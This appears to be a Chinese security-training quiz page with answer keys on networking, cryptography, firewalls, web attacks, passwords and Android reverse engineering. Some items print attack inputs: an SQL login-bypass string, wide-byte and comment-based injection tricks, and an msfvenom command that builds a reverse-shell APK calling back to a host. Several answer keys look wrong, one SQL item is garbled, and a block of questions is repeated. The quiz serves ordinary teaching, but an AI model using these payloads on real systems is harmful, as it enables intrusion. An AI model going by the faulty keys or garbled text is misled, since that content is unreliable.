微慑信息网

安全培训理论题の二

26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。

A、 2xx

B、 3xx

C、 4xx

D、 5xx

您的答案: 标准答案: C

27、买家称购买商品异常后的正确操作是立即咨询官方客服。

A、 正确

B、 错误

您的答案: 标准答案: A

28、网上陌生人给你发送补丁文件正确的操作是不下载文件。

A、 错误

B、 正确

您的答案: 标准答案: B

29、下列对于白帽、黑帽和灰帽黑客描述错误的是____。

A、 白帽黑客帮助企业进行安全测试

B、 黑帽黑客是自己对网站进行攻击

C、 灰帽黑客是不会恶意的使用漏洞进行攻击

D、 黑客所有的一切操作都是违法的

您的答案: 标准答案: D

30、白帽黑客正确的的行为是不可以传播、共享数据。

A、 错误

B、 正确

您的答案: 标准答案: B

31、用于电子邮件传输网络标准的协议是

A、 SMTP

B、 PPTP

C、 MLTP

您的答案: 标准答案: A

32、能支持非ASCII码字符文本格式的标准是

A、 SMTP

B、 MIME

C、 JSON

您的答案: 标准答案: B

33、1995年推出了新ESMTP的RFC号是

A、 RFC5321

B、 RFC1869

C、 RFC821

您的答案: 标准答案: B

34、SMTP只支持7位ASCII码,且不能传输二进制文件

A、 对

B、 错

您的答案: 标准答案: A

35、第一次是谁提出现代密码学编码原则的

A、 1884年Kerchoffs提出加密规则

B、 1883年Kerchoffs提出编码原则

C、 1884年Kerchoffs提出编码算法

D、 1883年Kerchoffs提出规则加密

您的答案: 标准答案: B

36、目前流行的加密算法有DES,AES,RSA,MD5,SHA1?

A、 对

B、 错

您的答案: 标准答案: A

37、常见非对称式算法有?

A、 DES,3DES,ASE

B、 ASE,RSA,ECC,MD5,SHA,DSA

C、 DES,AES,RSA,MD5,SHA1

D、 RSA,DSA,ECC

您的答案: 标准答案: D

38、DES的加密长度是多少位?

A、 128位

B、 112或者128位

C、 128、192、256位

D、 56位

您的答案: 标准答案: D

39、物理生活中密码泄露通常是什方式泄露

A、 网络上面使用弱口令被通过碰撞方式泄露

B、 公共场合免费WIFI等

C、 钓鱼网站

D、 以上全对

您的答案: 标准答案: B

40、使用什么协议浏览网页更加安全

A、 ftp

B、 http

C、 https

D、 tcp/ip

您的答案: 标准答案: C

41、使用最正确的方式防范个人信息安全的是?

A、 在网络中使用多个复杂密码提高自身密码安全性防止服务商泄露

B、 在网络中使用多个复杂密码提高自身密码安全性

C、 使用notepad记录常用密码放到电脑

D、 使用复杂密码定期修改,选择可靠平台,不主动透露个人信息

您的答案: 标准答案: D

42、及时发现项目BUG进行日志监控,哪些操作最合理正确?

A、 查看服务器配置的WEB日志进行监控

B、 使用安全防护软件进行日志扫描

C、 能在用户发生错误的那一刻,通过日志发现那些黑客在攻击我们

D、 使用常见的日志检查工具,配合debug模式进行测试查看是否控制严格

您的答案: 标准答案: D

43、如何做好日常防护防范

A、 不信任客户端提交过来的任何数据

B、 不接受客户端提交过来的任何数据

C、 客户端提交过来的数据严格检查,做好规则

D、 不理客户端提交过来的数据该怎么提交就怎么提交

您的答案: 标准答案: C

44、网络中使用防火墙起到什么作用?

A、 防止电脑报错

B、 防止流量异常

C、 防止黑客

D、 保护内部敏感信息资源,防止内部泄露

您的答案: 标准答案: D

45、网络传输五元组以下那个正确?

A、 目的端口,源端口,应用层,传输层,物理层

B、 原Mac,目的MAC,数据链路层,网络层,会话层

C、 目的IP,原IP,协议号,目的端口,原端口,会话层

D、 目的IP,原IP,协议号,目的端口,原端口

您的答案: 标准答案: D

46、防火墙访问控制列表”允许任何流量通过”规则

A、 access-list 1 deny 172.16.4.13 0.0.0.0

B、 access-list 2 permit 172.16.0.0 0.0.255.255

C、 access-list 3 permit 0.0.0.0 255.255.255.255

D、 access-list 3 permit 0.0.0.0 255.0.0.255

您的答案: 标准答案: C

47、透明模式和桥模式说法正确的有?

A、 内外网在一个网段内

B、 有点是直接串联到链路上,不改变原有的网络IP地址

C、 缺点是像玻璃一样,屋内屋外一览无余

D、 以上全对

您的答案: 标准答案: D

48、虚拟化主机安全?

A、 云存储安全,云存储杀毒,访问控制,源数据备份

B、 vVirus,vFw,vSwitch,vIDS,运维审计,安全加固

C、 云安全管理平台,SDN+VxLan,安全域划分,网络边界防护,运维审计

D、 温、温度,接地,防静电,消防

您的答案: 标准答案: B

49、什么技术可以伪造任意电话号码?

A、 钓鱼电话

B、 冒充电话

C、 伪基站技术

D、 网络电话

您的答案: 标准答案: C

50、劫持到其他网页和游戏广告是从那个入口被劫持的

A、 链接网络

B、 网络接口

C、 路由器

D、 电脑

您的答案: 标准答案: C

1、路由器有哪几种加密方式

A、 WEP,WEPA-PSD,WPA2-PSK,WPA-PSK+WPA2-PSK

B、 WEP,WEPA-PSA,WPA2-PSK,WPA-PSK

C、 WEP,WEPA-PSS,WPA2-PSK,WPA-PSK+WPA2-PSK

D、 WEP,WEPA-PSK,WPA2-PSK,WPA-PSK+WPA2-PSK

您的答案: 标准答案: D

2、黑客劫持DNS会出现那些状况

A、 网络浏览网页变快

B、 网络浏览网页速度明显变慢

C、 网络加速

D、 网络浏览网页更加安全

您的答案: 标准答案: B

3、网购诈骗流程操作?

A、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作

B、 交易失败-虚假客户-误导提示-网银授权操作-洗劫卖家网银账号

C、 交易失败-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

D、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

您的答案: 标准答案: D

4、邮件收发环境包括()来完全组合:

A、 防火墙,DMZ隔离区,网络中间节点

B、 邮件服务器,邮件客户端

C、 数据库,Appliance,云端

D、 防火墙,DMZ隔离区,Appliance,网络中间节点,邮件服务器,邮件客户端,数据库,云端

您的答案: 标准答案: D

5、邮件投递过程中顺序正确的是():

A、 MUA编辑邮件,MSA编辑完发送,MTA邮件传输,MDA邮件投递

B、 MSA编辑完发送,MDA邮件投递

C、 邮件用户代理,邮件递交代理,邮件投递代理,邮件传输代理

D、 编辑邮件,MTA邮件传输,邮件递交代理,邮件投递代理

您的答案: 标准答案: A

6、利用 DNS查找目的地址,记录说明错误的是():

A、 A记录:主机到IP地址的映射

B、 CNAME记录:查找主机别名

C、 MX记录:Domain到MTA的映射

D、 CNAME记录:查找IP别名

您的答案: 标准答案: D

7、DNS记录类型说明错误的是():

A、 CNAME:别名到域名的映射

B、 PTR:正向DNS解析

C、 MX:实现主机名到接收邮件的主机名映射

D、 SPE:Mail Client简单的认证方式

您的答案: 标准答案: B

8、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

9、论文《计算机安全威胁监控与监视》提出的监视入侵活动的思路是

A、 利用日志作为审计数据监视入侵活动

B、 利用流量作为审计数据监视入侵活动

C、 利用恶意代码作为审计数据监视入侵活动

您的答案: 标准答案: A

10、IDS设备部署的关键是

A、 关键是查杀恶意代码

B、 关键是设备的正确配置

C、 关键是阻断攻击流量

D、 关键是日常安全事件的跟踪与处理

您的答案: 标准答案: D

11、入侵检测系统可以检测存在的恶意代码

A、 对

B、 错

您的答案: 标准答案: B

12、沙箱是通过哪种方式检测入侵

A、 逆向分析

B、 虚假目标

C、 行为表现

D、 流量检测

您的答案: 标准答案: C

13、把IDS串联在保护目标前就成了IPS

A、 对

B、 错

您的答案: 标准答案: B

14、攻击者利用中间人技术监听网络数据流量是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

您的答案: 标准答案: A

15、Web服务器遭到ddos攻击,Web服务中断是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

您的答案: 标准答案: C

16、安全保障需求的原因是价值风险。

A、 对

B、 错

您的答案: 标准答案: A

17、我国信息安全的标准是等级保护。

A、 对

B、 错

您的答案: 标准答案: A

18、密钥的传递方法有哪些?

A、 物理传递

B、 旧密钥加密新密钥

C、 加密链路

D、 对称加密

您的答案: 标准答案: D

19、UNIX文件的访问控制不包含下面哪一项?

A、 属主

B、 组成员

C、 root

D、 其他

您的答案: 标准答案: C

20、DoD(美国国防部)使用的四层分级制和权限空间不包含哪一项?

A、 绝密级

B、 隐私级

C、 秘密级

D、 机密级

您的答案: 标准答案: B

21、BLP模型中的“不上读,不下写”保证了数据的什么特性?

A、 安全性

B、 可用性

C、 完整性

D、 保密性

您的答案: 标准答案: D

22、TCP数据包报文中哪个字段不可以被利用来构成隐蔽通道?

A、 序号

B、 确认号

C、 保留字段

D、 数据迁移值

您的答案: 标准答案: D

23、下面那个保存密码的方式是最推荐的?

A、 脑记

B、 便签贴

C、 密码工具

D、 云笔记

您的答案: 标准答案: C

24、Google的GOTP采用哪一种方式做计数器?

A、 时间

B、 账号

C、 IP

D、 GPS

您的答案: 标准答案: A

25、HTTPS比HTTP安全,并且不会被截取到数据

A、 对

B、 错

您的答案: 标准答案: B

26、下列对称算法,哪个相对更安全?

A、 DES

B、 AES

C、 3DES

您的答案: 标准答案: B

27、1883年Kerchoffs 提出了编码的原则,是现代密码学与古密码的分界线

A、 对

B、 错

您的答案: 标准答案: A

28、下面关于OpenSSL心脏出血漏洞说法错误的是?

A、 OpenSSL默认端口443

B、 每次能获取到64Kb大小的信息

C、 没有任何危害

您的答案: 标准答案: C

29、网络全就是web安全。

A、 对

B、 错

您的答案: 标准答案: B

30、Des加密算法属于对称加密算法。

A、 对

B、 错

您的答案: 标准答案: A

31、下面不属于对称加密算法的是?

A、 DES

B、 AES

C、 hash

您的答案: 标准答案: C

32、数字签名能够伪造。

A、 对

B、 错

您的答案: 标准答案: B

33、Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。传输过程中是明文传输的。

A、 对

B、 错

您的答案: 标准答案: A

34、Cookie可进行简单的web用户状态认证。

A、 对

B、 错

您的答案: 标准答案: A

35、ORA可以协助证书作废过程。

A、 对

B、 错

您的答案: 标准答案: A

36、密码学的目的是?

A、 研究数据加密

B、 研究数据解密

C、 研究信息安全

D、 研究数据保密

您的答案: 标准答案: C

37、一个完整的密码体制,不包括以下( )要素。

A、 明文空间

B、 密文空间

C、 数字签名

D、 密钥空间

您的答案: 标准答案: C

38、以下关于等级保护的说法中不正确的是( )。

A、 是国家信息安全保障工作的基本制度、基本国策

B、 是开展信息安全工作的基本方法

C、 是提高国家综合竞争力的主要手段

D、 是促进信息化、维护国家信息安全的根本保障

您的答案: 标准答案: C

39、以下关于等级保护的说法中不正确的是:( )

A、 信息安全等级保护是对信息和信息载体按照重要性等级分级别进行保护的一种工作

B、 在中国、美国等很多国家都存在的一种信息安全领域的工作

C、 广义上为涉及到该工作的标准、产品、系统、信息等均依据等级保护思想的安全工作

D、 信息系统的等级保护工作不具有分级别保护的区别,可以统一进行防护

您的答案: 标准答案: D

40、以下关于等级保护工作说法不正确的是:( )

A、 信息安全等级保护工作主要是由使用方来进行,无需其他厂商、主管部门的参与

B、 等级保护是涉及技术与管理两个领域的复杂系统工程

C、 对于不同的信息系统划分不同的安全等级,提出逐级增强的安全指标基本要求

D、 信息安全等级保护建设的主要内容,就是要从“机密性、完整性以及可用性”的角度,客观评价保护对象(信息系统)的重要性

您的答案: 标准答案: A

41、访问网址www.1cbc.com.cn,将可能遭受( )攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

您的答案: 标准答案: B

42、钓鱼攻击具有下列选项中除了( )以外的所有特点。

A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

您的答案: 标准答案: B

43、下列对XSS攻击(跨站脚本攻击)描述正确的是( )

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。

B、 XSS攻击是DDOS攻击的一种变种。

C、 XSS攻击就是CC攻击。

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的。

您的答案: 标准答案: A

44、黑客利用IP地址进行攻击的方法有( )。

A、 欺骗

B、 解密

C、 窃取口令

D、 发送病毒

您的答案: 标准答案: A

45、下列对XSS攻击(跨站脚本攻击)描述正确的是( )。

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

您的答案: 标准答案: A

46、下列网络攻击者称谓中,( )的技术含量通常最低。

A、 黑客

B、 脚本小子

C、 间谍

D、 网络恐怖分子

您的答案: 标准答案: B

47、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作( )。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

您的答案: 标准答案: A

48、病毒可以通过下列选项中除( )以外的方式从一台计算机传播到另一台计算机。

A、 作为电子邮件的被感染文件

B、 优盘上的被感染文件

C、 从互联网上下载的被感染文件

D、 重启计算机

您的答案: 标准答案: D

49、计算机病毒有很多种类型,但不包括( )。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

您的答案: 标准答案: B

50、 黑客要想控制某些用户,需要把木马程序安装到用户的机器中,实际上安装的是( )。

A、 木马的控制端程序

B、 木马的服务端程序

C、 不用安装

D、 控制端、服务端程序都必需安装

您的答案: 标准答案: B

1、下列哪项不是信息安全的定义?

A、 数据安全,确保数据不会被非法入侵者读取或破坏

B、 程序安全,重视软件开发过程的品质及维护

C、 系统安全,维护计算机系统正常操作

D、 环境安全,管理员不能用弱口令

您的答案: 标准答案: D

2、下列哪项不是正确的防止被骗操作?

A、 在淘宝购买东西应该使用旺旺交流

B、 商家发送的发票文件,直接打开

C、 商品多次修改价格,应该提高警惕

D、 对商家发送的文件进行查杀

您的答案: 标准答案: B

3、下列选项中对DES加密算法描述不正确的是?

A、 以64位为分组对数据进行加密

B、 其密钥长度为56位

C、 运用相同算法进行加密解密

D、 DES加密算法为最安全的加密算法之一

您的答案: 标准答案: D

4、下列关于标准防火墙的描述错误的是?

A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了

B、 所有的规则都没有匹配到,数据包将丢弃

C、 安全过滤规则主要包含源、目的地址和端口

D、 防火墙的主要功能是防止病毒等恶意程序的传输

您的答案: 标准答案: D

5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?

A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip

B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问

C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问

D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问

您的答案: 标准答案: C

6、下列那些SMTP命令是用来发送邮件的Envelop的?

A、 HELO xxx.com

B、 MAIL FROM :<>和RCPT TO:<>

C、 DATA

D、 AUTH LOGIN

您的答案: 标准答案: B

7、下列关于信息安全保障的描述错误的是?

A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行

B、 信息系统安全的保障是在整个信息系统的生命周期中

C、 要确保信息系统的保密性、完整性、和可用性

D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力

您的答案: 标准答案: D

8、下列对于下一代防火墙的描述错误的是?

A、 将访问控制对象从网络层、传输层延伸到应用层

B、 下一代防火墙能够识别应用和内容

C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件

D、 下一代防火墙已经丢弃了传统防火墙的工作模式

您的答案: 标准答案: D

9、下列关于KDC的描述错误的是?

A、 KDC是秘钥分发中心

B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份

C、 KDC是由认证服务和票据授予服务组成

D、 认证服务的作用主要是生成两个主题之间通信的票据

您的答案: 标准答案: D

10、下列哪项不是防火墙常见的工作方式?

A、 包过滤

B、 状态监测

C、 透明接入

D、 应用代理

您的答案: 标准答案: C

1、下列哪项不是信息安全的定义?

A、 数据安全,确保数据不会被非法入侵者读取或破坏

B、 程序安全,重视软件开发过程的品质及维护

C、 系统安全,维护计算机系统正常操作

D、 环境安全,管理员不能用弱口令

标准答案: D

2、下列哪项不是正确的防止被骗操作?

A、 在淘宝购买东西应该使用旺旺交流

B、 商家发送的发票文件,直接打开

C、 商品多次修改价格,应该提高警惕

D、 对商家发送的文件进行查杀

标准答案: B

3、下列选项中对DES加密算法描述不正确的是?

A、 以64位为分组对数据进行加密

B、 其密钥长度为56位

C、 运用相同算法进行加密解密

D、 DES加密算法为最安全的加密算法之一

标准答案: D

4、下列关于标准防火墙的描述错误的是?

A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了

B、 所有的规则都没有匹配到,数据包将丢弃

C、 安全过滤规则主要包含源、目的地址和端口

D、 防火墙的主要功能是防止病毒等恶意程序的传输

标准答案: D

5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?

A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip

B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问

C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问

D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问

标准答案: C

6、下列那些SMTP命令是用来发送邮件的Envelop的?

A、 HELO xxx.com

B、 MAIL FROM :<>和RCPT TO:<>

C、 DATA

D、 AUTH LOGIN

标准答案: B

7、下列关于信息安全保障的描述错误的是?

A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行

B、 信息系统安全的保障是在整个信息系统的生命周期中

C、 要确保信息系统的保密性、完整性、和可用性

D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力

标准答案: D

8、下列对于下一代防火墙的描述错误的是?

A、 将访问控制对象从网络层、传输层延伸到应用层

B、 下一代防火墙能够识别应用和内容

C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件

D、 下一代防火墙已经丢弃了传统防火墙的工作模式

标准答案: D

9、下列关于KDC的描述错误的是?

A、 KDC是秘钥分发中心

B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份

C、 KDC是由认证服务和票据授予服务组成

D、 认证服务的作用主要是生成两个主题之间通信的票据

标准答案: D

10、下列哪项不是防火墙常见的工作方式?

A、 包过滤

B、 状态监测

C、 透明接入

D、 应用代理

标准答案: C

1、以下选项中对”multipart/form-data”的解释不正确的是?()

A、 基础方法是post请求

B、 基础方法是get请求

C、 http协议本身的原始方法不支持multipart/form-data

D、 可用于文件上传时,设置表单的MIME类型

标准答案: B

2、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

标准答案: A

3、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

标准答案: B

4、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

标准答案: B

5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

标准答案: D

6、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

标准答案: C

7、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为”异或”运算

D、 OR为”或”运算

标准答案: B

8、SQL语句”select * from user where name=’”.n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;.name.andpass=.pass.”’”如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’=’1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’=’1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

标准答案: C

9、以下选项中哪些措施不能防御CSRF攻击?()

A、 使用一次性Token验证

B、 在HTTP头中自定义属性并验证

C、 全部操作使用POST传递数值

D、 使用复杂度高的验证码

标准答案: C

10、以下哪个函数是作为FLASH与宿主界面JavaScript通信的接口?()

A、 External.call

B、 ExternalConfig.call

C、 ExternalInterface.call

D、 Externalrunning.call

标准答案: C

11、以下哪个选项的内容是JavaScript中的注释符?()

A、 ~

B、 //

C、 *

D、 #!

标准答案: B

12、以下哪个选项对于反射型XSS的描述是错误的?()

A、 可以结合CSRF来利用

B、 攻击代码存储在客户端

C、 攻击代码存储在服务端

D、 可以劫持用户访问链接

标准答案: C

13、以下哪个选项可以成功的设置Web应用浏览器端的Cookie值?()

A、 在浏览器Console中输入document.cookie=“test=123456”

B、 在浏览器Console中输入document.cookie(“test=123456”)

C、 在浏览器地址栏中输入document.cookie=“test=123456”

D、 在浏览器地址栏中输入document.cookie(“test=123456”)

标准答案: A

14、技术流的完整提供测试不包含下面那一项?

A、 勘察探索

B、 监测捕获

C、 错误定位

D、 错误修复

标准答案: D

15、以下哪个选项不属于安全测试的流程?

A、 信息汇总

B、 交互测试

C、 审核验证

D、 项目交接

标准答案: D

16、软件开发安全生产解决方法不包含哪一项?

A、 溯源检测

B、 合规检测

C、 安全检测

D、 应急响应

标准答案: D

17、安全检测需要嵌入到软件开发流程中。

A、 对

B、 错

标准答案: A

18、HTTPS的设计是可以避免下列哪种攻击?

A、 SQL注入攻击

B、 跨站脚本攻击

C、 中间人攻击

D、 暴力破解攻击

标准答案: C

19、同源策略不包含下面那一项?

A、 协议

B、 路径

C、 端口号

D、 域名

标准答案: A

20、哪些设置可以有效的避免cookie的完整性所带来的安全问题?

A、 Shared domain providers

B、 Website development/deployment

C、 Exploration of Cookie Policy Change

D、 HTTPS instead of HTTP

标准答案: D

21、App-web接口检测系统架构的组成包含哪些?

A、 Triggering

B、 Detection

C、 Provenance

D、 Counterattack

标准答案: D

22、App-web接口检测系统使用哪种方法识别APP上的广告?

A、 特征码

B、 接口扫描

C、 机器学习

D、 分类标识

标准答案: A

23、下面哪一项不属于浏览器的防护手段?

A、 沙盒

B、 隔离堆

C、 Httponly

D、 栈cookies

标准答案: C

24、Redis未授权漏洞的根本原因是运维人员安全意识薄弱

A、 对

B、 错

标准答案: A

25、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?

A、 redis-cli 192.168.1.1

B、 Redis -cli 192.168.1.1

C、 redis cli 192.168.1.1

标准答案: A

26、Centos6.5下,在当前目录下,搜索文件内容包含‘aa’文字的内容的命令是 find / | xargs grep “aa” ?

A、 对

B、 错

标准答案: B

27、$_GET可以用于接收表单的值。

A、 对

B、 错

标准答案: A

28、下面哪个不是CMS?

A、 WordPress

B、 织梦

C、 帝国CMS

D、 MVC

标准答案: D

29、SQL注入又可以称为“PHP注入”,“JSP注入”。

A、 对

B、 错

标准答案: B

30、假如MySQL数据库注入点存在,“select//user()//from/**/dual”该语句是否可以成功注入绕过空格过滤。

A、 对

B、 错

标准答案: A

31、SQLmap可以进行表单注入。

A、 对

B、 错

标准答案: A

32、为了防止恶意用户爆破web登录,为们只需在登录界面加上验证码提示。

A、 对

B、 错

标准答案: B

33、后台登录验证都是先验证验证码是否正确,再验证用户名密码是否正确

A、 对

B、 错

标准答案: B

34、在验证过程中,根据返回值在本地验证,该种验证方法可绕过

A、 对

B、 错

标准答案: A

35、只要用户的密码足够复杂,就不存在信息泄露的风险。

A、 对

B、 错

标准答案: B

36、Hydra 可以爆破Windows远程登录的账号和密码

A、 对

B、 错

标准答案: A

37、下面哪项密码设置方式会造成被弱口令攻击的风险?

A、 增大密码的复杂度

B、 使用初始化账号密码

C、 经常更改密码

标准答案: B

38、下面哪个密码更合乎密码安全性规则?

A、 qazwsx123

B、 helloworld

C、 789567123

D、 AECerg.21$khlle

标准答案: D

39、只要密码足够复杂,就不会存在密码泄露。

A、 对

B、 错

标准答案: B

40、WebLogic 默认的端口号是?

A、 3306

B、 9001

C、 7359

D、 7001

标准答案: D

41、下面不是防止WebLogic弱口令的是?

A、 修改默认端口

B、 修改默认账号密码

C、 使用默认配置路径

标准答案: C

42、WebLogic是一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

A、 对

B、 错

标准答案: A

43、为了密码安全起见,密码的更换周期一般为多久?

A、 30天

B、 60天

C、 90天

D、 一年

标准答案: C

44、不同注册使用相同的密码。

A、 对

B、 错

标准答案: B

45、下面哪个不属于使用密码的好习惯?

A、 将账号密码记录在网络上

B、 经常修改密码

C、 使用密码位数大于15位且复杂度高

标准答案: A

46、靠欺骗别人来获得安全敏感信息的方式被称作( )。

A、 社会工程学

B、 魔法攻击

C、 暴力破解攻击

D、 诡计攻击

标准答案: A

47、撞库得手的原因是( )。

A、 用户扫描不安全的二维码

B、 用户为图省事,在许多网站设置相同的用户名和口令

C、 用户电脑被植入木马

D、 用户连接不安全的无线网络导致

标准答案: B

48、在下述产生安全口令的方法中,相比而言最安全的一项是( )。

A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令

B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令

C、 组合用户的名字,形成一个字符串,将该串进行二进制表示

D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令

标准答案: D

49、最低效的口令攻击类型是______。

A、 暴力破解攻击

B、 字典攻击

C、 彩虹表攻击

D、 机器攻击

标准答案: A

50、在下述产生安全口令的方法中,相比而言最安全的一项是()

A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令。

B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令。

C、 组合用户的名字,形成一个字符串,将该串进行二进制表示。

D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令。

标准答案: D

1、使用adb调试工具如何卸载安卓程序?

A、 使用adb install命令加APK文件的路径来卸载安卓程序

B、 使用adb uninstall命令加APK文件的路径来卸载安卓程序

C、 使用adb delete命令加APK的包名卸载安卓程序,包名可通过逆向获得

D、 使用adb uninstall命令加APK的包名卸载安卓程序,包名可通过逆向获得

标准答案: D

2、下列关于smali的描述错误的是?

A、 smali是安卓系统中JAVA虚拟机(Dalvik)使用的一种.dex文件的汇编器

B、 安卓系统中代码最终编译不是采用java的class,而是使用smali

C、 smali是一种安卓开发语言

D、 smali有着自己独特的语法特点

标准答案: C

3、通常情况下,下列哪个目录不是APK安装后释放文件的目录?

A、 /data/app/

B、 /data/data/

C、 /sdcard/android

D、 /system/bin

标准答案: D

4、下列关于安卓系统目录的描述错误的是?

A、 /system/bin ,存放系统本地程序,主要是linux自带的组件

B、 /system/framework ,存放系统平台框架文件

C、 /system/app ,存放常规下载的应用程序

D、 /system/lib ,存放系统的配置文件,比如APN介入点设置等核心配置

标准答案: D

5、下列对于Dalvik字节码的描述错误的是?

A、 package/name/ObjectName相当于java中的package.name.ObjectName

B、 [[1相当于java中的int[][]

C、 .registers指定了方法中占用内存空间大小

D、 .local 指令表名了方法中寄存器的总数

标准答案: D

6、下列哪项不是APK中class文件的保护的方法?

A、 名称替换

B、 字符串加密

C、 增加变量

D、 反射替换

标准答案: C

7、下列哪项不是APK保护中native的功能?

A、 完整性校验

B、 漏洞检测

C、 单步检测

D、 断点检测

标准答案: B

8、下列哪项不是预防手机中xcodeghost病毒的措施?

A、 修改icloud密码

B、 下载盘古工具进行自检

C、 卸载或更新已感染文件

D、 手机进行越狱

标准答案: D

9、下面对于”msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -o ichunqiu.apk”的解读错误的是?

A、 生成一个叫ichunqiu.apk的恶意文件

B、 文件安装后执行会与IP为192.168.1.2的主机进行通信

C、 设置与主机通信的端口为4444

D、 通信时手机会打开4444端口

标准答案: D

10、Metasploit设置的LHOST是本机实际地址而不是外网地址。

A、 正确

B、 不正确

标准答案: A

11、数据运算之减法运算指令”sub-float vx,vy,vz”表示什么含义?

A、 计算vy-vz并将结果存入vx

B、 计算vx-vz并将结果存入vy

C、 计算vx-vy并将结果存入vz

D、 计算vy-vx并将结果存入vz

标准答案: A

12、移位指令之右移指令”shr-int vx,vy,vz” 表示什么含义?

A、 右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1

B、 无符号右移vy,vz指定移动的位置,结果存入vx

C、 右移vy,vz指定移动的位置,结果存入vx

D、 无符号右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1

标准答案: C

13、流程控制之if指令:”if-eq vA,vB,:cond_**”的含义是什么?

A、 如果vA等于vB则跳转到:cond_**

B、 如果vA小于vB则跳转到:cond_**

C、 如果vA大于vB则跳转到:cond_**

D、 如果vA等于vB则跳转到:cond_**

标准答案: D

14、(Android系统中,)java代码反编译之后那种字节码方便于读取

A、 Java字节码

B、 jvm字节码

C、 Dalvik字节码

D、 .class字节码

标准答案: C

15、反编译smali文件里面(.registers)函数表达的意思是?

A、 类

B、 数组

C、 寄存器

D、 参数为空

标准答案: C

16、代码中(new-instance v1,Ljava/lang/stringBuilder;)操作指令的表达的是?

A、 new一个v1

B、 new一个ljava

C、 new一个lang/stringBuilder放到v1

D、 new一个stringBuilder放到v1

